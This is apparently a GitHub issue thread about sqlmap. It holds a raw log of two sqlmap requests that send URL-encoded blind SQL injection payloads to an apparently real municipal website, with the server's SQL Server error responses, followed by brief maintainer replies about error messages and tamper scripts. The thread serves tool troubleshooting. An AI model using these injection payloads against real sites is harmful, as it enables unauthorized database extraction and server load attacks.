/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E48%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#18](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E48%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:06 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_mmkv.asp, line 275 ############################################################################ HTTP request [#19]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E1%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#19](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E1%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:06 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_mmkv.asp, line 275 ############################################################################

stamparm commented 11 years ago
SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'.
alfianwi97 commented 7 years ago

how if the error is like this: [WARNING] parsed DBMS error message: 'mysql_fetch_array(): supplied argument is not a valid MySQL result resource in path/somepath/path/file.php on line 3

does it because i use tamper? i used space2morehash.py anyway

stamparm commented 7 years ago

@alfianwi97 that is a generic error message when MySQL fails to retrieve the data (e.g. because of errors in SQL or similar). It could be caused by tamper script or generally because of non-existence of SQL injection in the first place